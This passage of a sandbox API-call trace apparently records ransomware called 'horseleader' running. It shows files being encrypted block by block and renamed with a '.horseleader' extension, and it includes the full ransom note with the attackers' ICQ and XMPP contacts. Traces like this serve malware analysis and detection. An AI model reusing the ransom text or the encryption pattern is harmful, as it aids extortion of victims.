Files\\Common 
Files\\Microsoft Shared\\MSInfo\\msinfo32.exe", lpSrch=".testttjffg") returned 0x0 [0234.467] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.467] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.467] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830a4e7c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x830a4e7c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x830cafdd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5c800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msinfo32.exe", cAlternateFileName="")) returned 0 [0234.467] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0234.467] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\#Decrypt#.txt") returned 71 [0234.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0234.468] lstrlenA (lpString="All your files have been 
ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.468] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0234.469] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.469] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0234.469] CloseHandle (hObject=0x21c) returned 1 [0234.469] 
GetProcessHeap () returned 0x780000 [0234.469] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0234.469] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0234.469] lstrcmpiW (lpString1="OFFICE14", lpString2="Windows") returned -1 [0234.469] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14") returned 59 [0234.469] lstrcmpW (lpString1="OFFICE14", lpString2=".") returned 1 [0234.469] lstrcmpW (lpString1="OFFICE14", lpString2="..") returned 1 [0234.469] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.469] GetProcessHeap () returned 0x780000 [0234.469] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0234.470] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*") returned 61 [0234.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0234.470] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.470] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\.") returned 61 [0234.470] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.470] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0234.470] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.470] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\..") returned 62 [0234.470] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.470] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.470] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 1 [0234.470] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0234.470] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033") returned 64 [0234.470] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0234.470] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0234.471] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.471] GetProcessHeap () returned 0x780000 [0234.471] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.471] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*") returned 66 [0234.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.472] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.472] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\.") returned 66 [0234.472] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.472] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, 
ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="..", cAlternateFileName="")) returned 1 [0234.472] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.472] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\..") returned 67 [0234.472] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.472] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.472] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0x305a8, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ACEINTL.DLL", cAlternateFileName="")) returned 1 [0234.472] lstrcmpiW (lpString1="ACEINTL.DLL", lpString2="Windows") returned -1 [0234.472] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 76 [0234.472] StrStrIW (lpFirst="ACEINTL.DLL", lpSrch=".horseleader") returned 0x0 [0234.472] lstrcmpW (lpString1="ACEINTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0234.472] lstrcmpW (lpString1="ACEINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0234.472] lstrlenW (lpString=".testttjffg") returned 11 [0234.472] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL", lpSrch=".testttjffg") returned 0x0 [0234.472] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.473] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.473] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0234.473] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 76 [0234.473] StrStrW (lpFirst="ACEINTL.DLL", lpSrch=".txt") returned 0x0 [0234.473] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=198056) returned 1 [0234.473] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.474] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.478] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.478] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.479] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x15ad4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.479] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) 
returned 1 [0234.491] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.491] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.491] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x2b5a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.492] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.497] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.497] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.498] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.498] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0234.498] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0234.498] CloseHandle (hObject=0x1a4) returned 1 [0234.499] GetProcessHeap () returned 0x780000 [0234.499] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) 
returned 0x7dd078 [0234.499] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.horseleader") returned 88 [0234.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.horseleader")) returned 1 [0234.500] GetProcessHeap () returned 0x780000 [0234.500] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0234.500] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0xcdb0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ACEODBCI.DLL", cAlternateFileName="")) returned 1 [0234.500] lstrcmpiW (lpString1="ACEODBCI.DLL", lpString2="Windows") returned -1 [0234.500] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 77 [0234.500] StrStrIW (lpFirst="ACEODBCI.DLL", lpSrch=".horseleader") returned 0x0 [0234.500] lstrcmpW (lpString1="ACEODBCI.DLL", lpString2="#Decrypt#.txt") returned 1 [0234.500] lstrcmpW (lpString1="ACEODBCI.DLL", lpString2="_uninstalling_.png") returned 1 [0234.500] lstrlenW (lpString=".testttjffg") returned 11 [0234.500] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL", lpSrch=".testttjffg") returned 0x0 [0234.500] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.500] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0234.501] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 77 [0234.501] StrStrW (lpFirst="ACEODBCI.DLL", lpSrch=".txt") returned 0x0 [0234.501] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=52656) returned 1 [0234.501] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.506] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.506] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.506] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.507] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.507] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.508] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2db0, lpOverlapped=0x0) returned 1 [0234.508] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd250, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2db0, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2db0, lpOverlapped=0x0) returned 1 [0234.508] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0234.509] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0234.509] CloseHandle (hObject=0x1a4) returned 1 [0234.509] GetProcessHeap () returned 0x780000 [0234.509] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0234.509] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\1033\\ACEODBCI.DLL.horseleader") returned 89 [0234.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.horseleader")) returned 1 [0234.510] GetProcessHeap () returned 0x780000 [0234.511] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0234.511] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, 